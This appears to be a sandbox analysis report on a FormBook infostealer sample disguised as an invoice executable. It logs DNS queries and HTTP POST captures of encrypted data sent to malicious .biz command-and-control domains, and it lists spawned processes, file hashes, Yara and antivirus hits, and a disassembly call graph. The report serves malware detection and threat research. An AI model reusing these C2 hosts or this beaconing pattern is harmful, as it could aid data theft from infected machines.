                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Dec 13, 2024 08:57:42.041624069 CET1.1.1.1192.168.2.70x4dd5No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                        Dec 13, 2024 08:57:45.324726105 CET1.1.1.1192.168.2.70x95c3No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                        Dec 13, 2024 08:57:46.168780088 CET1.1.1.1192.168.2.70x9394No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                        Dec 13, 2024 08:57:47.218055010 CET1.1.1.1192.168.2.70xd80aNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                        Dec 13, 2024 08:57:49.185622931 CET1.1.1.1192.168.2.70xe6e0No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                        Dec 13, 2024 08:57:50.117605925 CET1.1.1.1192.168.2.70x95f2No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                        Dec 13, 2024 08:58:02.450383902 CET1.1.1.1192.168.2.70x92bcName error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                        Dec 13, 2024 08:58:05.747647047 CET1.1.1.1192.168.2.70xd2aeName error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                        Dec 13, 2024 08:58:05.980045080 CET1.1.1.1192.168.2.70xe2adName error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                        Dec 13, 2024 08:59:48.431207895 CET1.1.1.1192.168.2.70x841aNo error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                        Dec 13, 2024 08:59:48.431207895 CET1.1.1.1192.168.2.70x841aNo error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • pywolwnvd.biz
                                        • ssbzmoy.biz
                                        • cvgrf.biz
                                        • knjghuig.biz
                                        • vcddkls.biz

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.74970054.244.188.177807368C:\Users\user\Desktop\INV_NE_02_2034388.exe
                                        TimestampBytes transferredDirectionData
                                        Dec 13, 2024 08:57:43.585007906 CET358OUTPOST /wtafuencqgdxd HTTP/1.1
                                        Cache-Control: no-cache
                                        Connection: Keep-Alive
                                        Pragma: no-cache
                                        Host: pywolwnvd.biz
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                        Content-Length: 824
                                        Dec 13, 2024 08:57:43.585007906 CET824OUTData Raw: 53 59 33 53 9c b7 b3 48 2c 03 00 00 17 fe db 43 9b 40 bc 56 22 30 b9 71 33 6b b3 d0 39 f4 0e 7b 69 90 b7 ae 26 6a 2f 51 1f d6 ce 56 4b 05 78 87 9f db e4 ba f4 a8 08 73 3a c0 28 5f 6c 1a 6e f4 bb bd ec 5b 70 86 8b 96 26 2c 80 ce 6c 06 89 ca 34 37
                                        Data Ascii: SY3SH,C@V"0q3k9{i&j/QVKxs:(_ln[p&,l47+|%6\z0] uNw3DAQp Bl.ZYl ,\nBR\rGmAz^\8#nzM{=oWCNoPpNz8O];`o&q,pvllP
                                        Dec 13, 2024 08:57:44.886413097 CET413INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Fri, 13 Dec 2024 07:57:44 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Set-Cookie: btst=712277f526c0023fa93e3c1906b9585b|8.46.123.189|1734076664|1734076664|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.74970154.244.188.17780
                                        TimestampBytes transferredDirectionData
                                        Dec 13, 2024 08:57:45.668587923 CET361OUTPOST /trlioiljoillllwq HTTP/1.1
                                        Cache-Control: no-cache
                                        Connection: Keep-Alive
                                        Pragma: no-cache
                                        Host: pywolwnvd.biz
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                        Content-Length: 874
                                        Dec 13, 2024 08:57:45.668606997 CET874OUTData Raw: 07 8f 48 df c9 2d 09 0a 5e 03 00 00 91 fd 3f 6f bf 18 6d 96 52 d4 08 65 15 ef f1 48 00 36 e3 54 d7 91 1e 66 08 a6 b7 96 0e 2a eb d2 c4 62 cf 7a 1b d9 2a de 5e 0a 7e 42 66 98 3f f5 d5 69 da 80 d7 1c b9 e0 11 7b 0b cd a6 5c 45 7c 55 13 45 77 2c 86
                                        Data Ascii: H-^?omReH6Tf*bz*^~Bf?i{\E|UEw,jwMP8ezW}W!jEGT:@#:{CNHz(yqR{:|Z%\qaMZ:(>CoEc&:?e^kx:gHHuhKA]$t
                                        Dec 13, 2024 08:57:47.022608042 CET413INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Fri, 13 Dec 2024 07:57:46 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Set-Cookie: btst=6e1bba5a5fba7cc674cf1f0d1809520a|8.46.123.189|1734076666|1734076666|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.74970218.141.10.107807368C:\Users\user\Desktop\INV_NE_02_2034388.exe
                                        TimestampBytes transferredDirectionData
                                        Dec 13, 2024 08:57:46.403182983 CET359OUTPOST /amnlbtdctisruxvs HTTP/1.1
                                        Cache-Control: no-cache
                                        Connection: Keep-Alive
                                        Pragma: no-cache
                                        Host: ssbzmoy.biz
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                        Content-Length: 824
                                        Dec 13, 2024 08:57:46.403234005 CET824OUTData Raw: e0 5b 4b 86 22 16 d7 ec 2c 03 00 00 c8 fe 01 6d fd b2 e6 66 4a b9 a9 97 d8 8d b1 dd 03 12 ee d7 78 35 d9 1b 85 35 1f a5 7e 0a 83 52 83 27 d3 0d 2f 97 16 76 9b a8 83 42 5f 19 44 75 3b 8d b5 e5 ca 29 d6 62 3f 92 3e 93 72 25 9e 5b 4b 87 06 71 9a 9e
                                        Data Ascii: [K",mfJx55~R'/vB_Du;)b?>r%[Kq=L`;{]*^ 6%nRvcVQ22!'\fI{16.V_OT08Mi}Yz\LC{zcZY]7^pnv"(
                                        Dec 13, 2024 08:57:48.450704098 CET411INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Fri, 13 Dec 2024 07:57:48 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Set-Cookie: btst=9dd6f1f32d0205f1ca5977e345492ac9|8.46.123.189|1734076668|1734076668|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.74970318.141.10.10780
                                        TimestampBytes transferredDirectionData
                                        Dec 13, 2024 08:57:47.382857084 CET351OUTPOST /wibawwpi HTTP/1.1
                                        Cache-Control: no-cache
                                        Connection: Keep-Alive
                                        Pragma: no-cache
                                        Host: ssbzmoy.biz
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                        Content-Length: 874
                                        Dec 13, 2024 08:57:47.382895947 CET874OUTData Raw: 3c c1 f9 ed 68 5f f4 ba 5e 03 00 00 40 e7 61 44 da 3f 9c 81 e9 94 dd 10 5a 68 b1 00 51 46 84 3e 4d 8c 5a 34 bc b7 11 1e 28 fe 8c 44 c8 f1 c6 de 87 3a 2f 76 2e ea 9f 67 fb 29 af 8d b4 c6 72 c9 e3 13 eb 22 a3 d9 56 12 36 35 6a 58 71 69 96 c2 86 06
                                        Data Ascii: <h_^@aD?ZhQF>MZ4(D:/v.g)r"V65jXqijX^aA#.j_MDQMCU*zBE2O>eAD8p4=J lSSldRqT5_4@%W~9UbTM&?
                                        Dec 13, 2024 08:57:49.917896032 CET411INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Fri, 13 Dec 2024 07:57:49 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Set-Cookie: btst=3e7ffa94220fa028bf7f9fcb84ec32ba|8.46.123.189|1734076669|1734076669|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.74970554.244.188.17780
                                        TimestampBytes transferredDirectionData
                                        Dec 13, 2024 08:57:50.470268011 CET350OUTPOST /mddjrljmh HTTP/1.1
                                        Cache-Control: no-cache
                                        Connection: Keep-Alive
                                        Pragma: no-cache
                                        Host: cvgrf.biz
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                        Content-Length: 874
                                        Dec 13, 2024 08:57:50.470310926 CET874OUTData Raw: cb f3 16 8c 7c e4 71 2c 5e 03 00 00 e2 c4 de 9a 87 41 63 03 c7 22 e3 08 e1 8c 03 7d bc c7 c2 2a 0a 14 e9 7b e8 b3 05 41 8a 03 4e 6b b3 8a 44 94 18 5d 8d fc aa 40 6b a3 08 2e 8a 83 17 be 15 2d 76 95 33 ee 41 3e 5c 14 3d 0d 23 92 69 05 5c 10 c3 a4
                                        Data Ascii: |q,^Ac"}*{ANkD]@k.-v3A>\=#i\:*n]HH9=Mu>Teu-AysT5U/IL})>^88,_Hjv2A:N?2X\y}izE"cb<9b=Tl?&K^5l
                                        Dec 13, 2024 08:57:51.801510096 CET409INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Fri, 13 Dec 2024 07:57:51 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Set-Cookie: btst=74775f00e314d2dc9f913370c78f2c1a|8.46.123.189|1734076671|1734076671|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        5192.168.2.74973818.141.10.10780
                                        TimestampBytes transferredDirectionData
                                        Dec 13, 2024 08:58:03.445158958 CET348OUTPOST /btfx HTTP/1.1
                                        Cache-Control: no-cache
                                        Connection: Keep-Alive
                                        Pragma: no-cache
                                        Host: knjghuig.biz
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                        Content-Length: 874
                                        Dec 13, 2024 08:58:03.445158958 CET874OUTData Raw: 2d c3 2f 50 f1 75 5e 35 5e 03 00 00 ea 1c b5 4f 1f 0f 5d ff b8 e6 a5 16 e7 bf 16 69 f2 77 28 24 3d 42 54 32 7f 19 f0 e3 0f 6f e1 25 00 33 cf 50 0c 73 c3 dc 5f 4f dc bf 32 37 4f 76 44 44 74 ad 9f 82 1d 0c d5 30 3d d5 3b 5f 29 98 4b 81 5f 64 ee da
                                        Data Ascii: -/Pu^5^O]iw($=BT2o%3Ps_O27OvDDt0=;_)K_dB+I1!jD@;v_n*^A!Ul,Q;u&!kb=WIp4Ay5rV43]%a$qbflH%z@2a5F}ZNJ-"pP<3:J`
                                        Dec 13, 2024 08:58:05.495245934 CET412INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Fri, 13 Dec 2024 07:58:05 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Set-Cookie: btst=4eb91c0fa1af41a8f694ca6a8a0a6b10|8.46.123.189|1734076685|1734076685|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        6192.168.2.74997318.141.10.10780
                                        TimestampBytes transferredDirectionData
                                        Dec 13, 2024 08:59:45.773694038 CET344OUTPOST /x HTTP/1.1
                                        Cache-Control: no-cache
                                        Connection: Keep-Alive
                                        Pragma: no-cache
                                        Host: vcddkls.biz
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                        Content-Length: 874
                                        Dec 13, 2024 08:59:45.773741007 CET874OUTData Raw: 51 50 ef ee 46 72 c6 f0 5e 03 00 00 06 f4 60 1e 74 fe 9c 32 7d d2 1a 75 e3 ac f5 41 a2 b1 1e 62 b5 25 ce 26 f3 8a c9 f0 e7 b4 ee c1 6f b3 d1 5c a7 67 a5 6d a7 3b fe 73 2d 97 dc fd 09 0b 91 a2 17 e6 ef f7 27 e5 e2 76 ed 0b d6 54 bb d3 23 5f 33 36
                                        Data Ascii: QPFr^`t2}uAb%&o\gm;s-'vT#_36\ #31{?;IQK_He&5YZ"sXsQlZ"5ixomMqVrqM+:vxyr"TM4,PR@foM.!pzc[[BeG2@
                                        Dec 13, 2024 08:59:47.833221912 CET411INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Fri, 13 Dec 2024 07:59:47 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Set-Cookie: btst=dddbf26da97ca1ee58a7be5d18438cfd|8.46.123.189|1734076787|1734076787|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:02:57:39
                                        Start date:13/12/2024
                                        Path:C:\Users\user\Desktop\INV_NE_02_2034388.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\INV_NE_02_2034388.exe"
                                        Imagebase:0x400000
                                        File size:1'790'464 bytes
                                        MD5 hash:C5843430A72FA7B29070C33F0F4D83D2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:2
                                        Start time:02:57:39
                                        Start date:13/12/2024
                                        Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                        Imagebase:0x400000
                                        File size:1'658'880 bytes
                                        MD5 hash:4768582FEC7E07C429C532098BB3A67A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        Reputation:low
                                        Has exited:false

                                        General

                                        Target ID:5
                                        Start time:02:57:40
                                        Start date:13/12/2024
                                        Path:C:\Windows\System32\alg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\alg.exe
                                        Imagebase:0x140000000
                                        File size:1'594'368 bytes
                                        MD5 hash:B0C38B43BA0CC2CDF73E2C84A80101CF
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        Reputation:low
                                        Has exited:false

                                        General

                                        Target ID:9
                                        Start time:02:57:41
                                        Start date:13/12/2024
                                        Path:C:\Windows\System32\drivers\AppVStrm.sys
                                        Wow64 process (32bit):false
                                        Commandline:
                                        Imagebase:0x7ff6357c0000
                                        File size:138'056 bytes
                                        MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:false

                                        General

                                        Target ID:10
                                        Start time:02:57:41
                                        Start date:13/12/2024
                                        Path:C:\Windows\System32\drivers\AppvVemgr.sys
                                        Wow64 process (32bit):
                                        Commandline:
                                        Imagebase:
                                        File size:174'408 bytes
                                        MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:false

                                        General

                                        Target ID:11
                                        Start time:02:57:41
                                        Start date:13/12/2024
                                        Path:C:\Windows\System32\drivers\AppvVfs.sys
                                        Wow64 process (32bit):
                                        Commandline:
                                        Imagebase:
                                        File size:154'952 bytes
                                        MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:false

                                        General

                                        Target ID:12
                                        Start time:02:57:41
                                        Start date:13/12/2024
                                        Path:C:\Windows\System32\AppVClient.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\AppVClient.exe
                                        Imagebase:0x140000000
                                        File size:1'348'608 bytes
                                        MD5 hash:BAE30C5C71632F53795DE111E7ED6DC7
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:14
                                        Start time:02:57:43
                                        Start date:13/12/2024
                                        Path:C:\Windows\System32\FXSSVC.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\fxssvc.exe
                                        Imagebase:0x140000000
                                        File size:1'242'624 bytes
                                        MD5 hash:CCD5F7B3E8C0B4733DD115FF88547F14
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:16
                                        Start time:02:57:45
                                        Start date:13/12/2024
                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                                        Imagebase:0x140000000
                                        File size:2'354'176 bytes
                                        MD5 hash:F48DDCBA6A247532AFB4E29CAAD7C016
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 100%, Joe Sandbox ML
                                        Reputation:low
                                        Has exited:false

                                        General

                                        Target ID:17
                                        Start time:02:57:45
                                        Start date:13/12/2024
                                        Path:C:\Windows\SysWOW64\svchost.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\INV_NE_02_2034388.exe"
                                        Imagebase:0x960000
                                        File size:46'504 bytes
                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.1702591892.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.1704054953.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:18
                                        Start time:02:57:46
                                        Start date:13/12/2024
                                        Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                        Imagebase:0x140000000
                                        File size:1'725'440 bytes
                                        MD5 hash:1B5C1CB5B173A3E9004CEBAB7FD31E75
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        Reputation:low
                                        Has exited:true

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:3.5%
                                          Dynamic/Decrypted Code Coverage:6.8%
                                          Signature Coverage:9.8%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:63
                                          execution_graph 108725 b85a3b 108726 b85a45 108725->108726 108730 b84f7c 108725->108730 108727 b85a4b CreateThread 108726->108727 108728 b851ae 108726->108728 108729 b85a59 RtlExitUserThread 108727->108729 108734 b85b1d 108729->108734 108731 b84f88 108730->108731 108737 b85d20 108730->108737 108735 b85d20 2 API calls 108734->108735 108736 b85b3c 108735->108736 108736->108736 108739 b85d22 108737->108739 108738 b85d39 VirtualAlloc 108738->108739 108739->108731 108739->108738 108740 b85d46 VirtualFree 108739->108740 108740->108731 108742 43fe27 108755 41f944 108742->108755 108744 43fe3d 108745 43fe53 108744->108745 108746 43febe 108744->108746 108844 409e5d 60 API calls 108745->108844 108764 40fce0 108746->108764 108748 43fe92 108750 44089c 108748->108750 108751 43fe9a 108748->108751 108846 469e4a 89 API calls 4 library calls 108750->108846 108845 46834f 59 API calls Mailbox 108751->108845 108754 43feb2 Mailbox 108756 41f950 108755->108756 108757 41f962 108755->108757 108847 409d3c 108756->108847 108759 41f991 108757->108759 108760 41f968 108757->108760 108761 409d3c 60 API calls 108759->108761 108860 420db6 108760->108860 108763 41f95a 108761->108763 108763->108744 108905 408180 108764->108905 108766 40fd3d 108768 44472d 108766->108768 108813 4106f6 108766->108813 108910 40f234 108766->108910 109041 469e4a 89 API calls 4 library calls 108768->109041 108771 444742 108772 44488d 108772->108771 108778 40fe4c 108772->108778 109047 47a2d9 85 API calls Mailbox 108772->109047 108773 40fe3e 108773->108772 108773->108778 109045 4566ec 59 API calls 2 library calls 108773->109045 108774 410517 108783 420db6 Mailbox 59 API calls 108774->108783 108776 420db6 59 API calls Mailbox 108805 40fdd3 108776->108805 108784 4448f9 108778->108784 108830 444b53 108778->108830 108914 40837c 108778->108914 108779 4447d7 108779->108771 109043 469e4a 89 API calls 4 library calls 108779->109043 108780 444848 109046 4560ef 59 API calls 2 library calls 108780->109046 108791 410545 _memmove 108783->108791 108792 444917 108784->108792 109049 4085c0 108784->109049 108787 444755 108787->108779 109042 40f6a3 341 API calls 108787->109042 108789 4448b2 Mailbox 108789->108778 109048 4566ec 59 API calls 2 library calls 108789->109048 108798 420db6 Mailbox 59 API calls 108791->108798 108797 444928 108792->108797 108800 4085c0 59 API calls 108792->108800 108793 40fea4 108801 444ad6 108793->108801 108802 40ff32 108793->108802 108836 410179 Mailbox _memmove 108793->108836 108794 44486b 108795 409ea0 341 API calls 108794->108795 108795->108772 108797->108836 109057 4560ab 59 API calls Mailbox 108797->109057 108842 410106 _memmove 108798->108842 108800->108797 109065 469ae7 60 API calls 108801->109065 108803 420db6 Mailbox 59 API calls 108802->108803 108807 40ff39 108803->108807 108805->108771 108805->108773 108805->108774 108805->108776 108805->108787 108805->108791 108818 44480c 108805->108818 109011 409ea0 108805->109011 108807->108813 108921 4109d0 108807->108921 108809 444a4d 108810 409ea0 341 API calls 108809->108810 108811 444a87 108810->108811 108811->108771 109060 4084c0 108811->109060 109040 469e4a 89 API calls 4 library calls 108813->109040 108815 40ffb2 108815->108791 108815->108813 108822 40ffe6 108815->108822 109044 469e4a 89 API calls 4 library calls 108818->109044 108820 444ab2 109064 469e4a 89 API calls 4 library calls 108820->109064 108826 408047 59 API calls 108822->108826 108827 410007 108822->108827 108825 409d3c 60 API calls 108825->108836 108826->108827 108827->108813 108831 444b24 108827->108831 108834 41004c 108827->108834 108828 410398 108828->108754 108829 420db6 59 API calls Mailbox 108829->108836 108830->108771 109066 469e4a 89 API calls 4 library calls 108830->109066 108832 409d3c 60 API calls 108831->108832 108832->108830 108833 4100d8 108835 409d3c 60 API calls 108833->108835 108834->108813 108834->108830 108834->108833 108838 4100eb 108835->108838 108836->108809 108836->108813 108836->108820 108836->108825 108836->108828 108836->108829 108837 444a1c 108836->108837 109009 408740 68 API calls __cinit 108836->109009 109010 408660 68 API calls 108836->109010 109058 465937 68 API calls 108836->109058 109059 4089b3 69 API calls Mailbox 108836->109059 108840 420db6 Mailbox 59 API calls 108837->108840 108838->108813 108998 4082df 108838->108998 108840->108809 108842->108836 108843 410162 108842->108843 109035 409c90 108842->109035 108843->108754 108844->108748 108845->108754 108846->108754 108848 409d4a 108847->108848 108858 409d78 Mailbox 108847->108858 108849 409d9d 108848->108849 108855 409d50 Mailbox 108848->108855 108870 408047 108849->108870 108851 409d64 108852 409dcc 108851->108852 108853 409d6f 108851->108853 108851->108858 108852->108858 108874 408cd4 59 API calls Mailbox 108852->108874 108857 43f9e6 VariantClear 108853->108857 108853->108858 108854 43fa0f 108854->108858 108875 456e8f 59 API calls 108854->108875 108855->108851 108855->108854 108857->108858 108858->108763 108863 420dbe 108860->108863 108862 420dd8 108862->108763 108863->108862 108865 420ddc std::exception::exception 108863->108865 108877 42571c 108863->108877 108894 4233a1 DecodePointer 108863->108894 108895 42859b RaiseException 108865->108895 108867 420e06 108896 4284d1 58 API calls _free 108867->108896 108869 420e18 108869->108763 108871 408052 108870->108871 108872 40805a 108870->108872 108876 407f77 59 API calls 2 library calls 108871->108876 108872->108858 108874->108858 108875->108858 108876->108872 108878 425797 108877->108878 108890 425728 108877->108890 108903 4233a1 DecodePointer 108878->108903 108880 42579d 108904 428b28 58 API calls __getptd_noexit 108880->108904 108883 42575b RtlAllocateHeap 108884 42578f 108883->108884 108883->108890 108884->108863 108886 425783 108901 428b28 58 API calls __getptd_noexit 108886->108901 108890->108883 108890->108886 108891 425781 108890->108891 108892 425733 108890->108892 108900 4233a1 DecodePointer 108890->108900 108902 428b28 58 API calls __getptd_noexit 108891->108902 108892->108890 108897 42a16b 58 API calls __NMSG_WRITE 108892->108897 108898 42a1c8 58 API calls 7 library calls 108892->108898 108899 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 108892->108899 108894->108863 108895->108867 108896->108869 108897->108892 108898->108892 108900->108890 108901->108891 108902->108884 108903->108880 108904->108884 108906 40818f 108905->108906 108909 4081aa 108905->108909 109067 407e4f 108906->109067 108908 408197 CharUpperBuffW 108908->108909 108909->108766 108911 40f251 108910->108911 108912 40f272 108911->108912 109071 469e4a 89 API calls 4 library calls 108911->109071 108912->108805 108915 40838d 108914->108915 108916 43edbd 108914->108916 108917 420db6 Mailbox 59 API calls 108915->108917 108918 408394 108917->108918 108919 4083b5 108918->108919 109072 408634 59 API calls Mailbox 108918->109072 108919->108784 108919->108793 108922 444cc3 108921->108922 108936 4109f5 108921->108936 109133 469e4a 89 API calls 4 library calls 108922->109133 108924 410cfa 108924->108815 108926 410ee4 108926->108924 108928 410ef1 108926->108928 109131 411093 341 API calls Mailbox 108928->109131 108929 410a4b PeekMessageW 108986 410a05 Mailbox 108929->108986 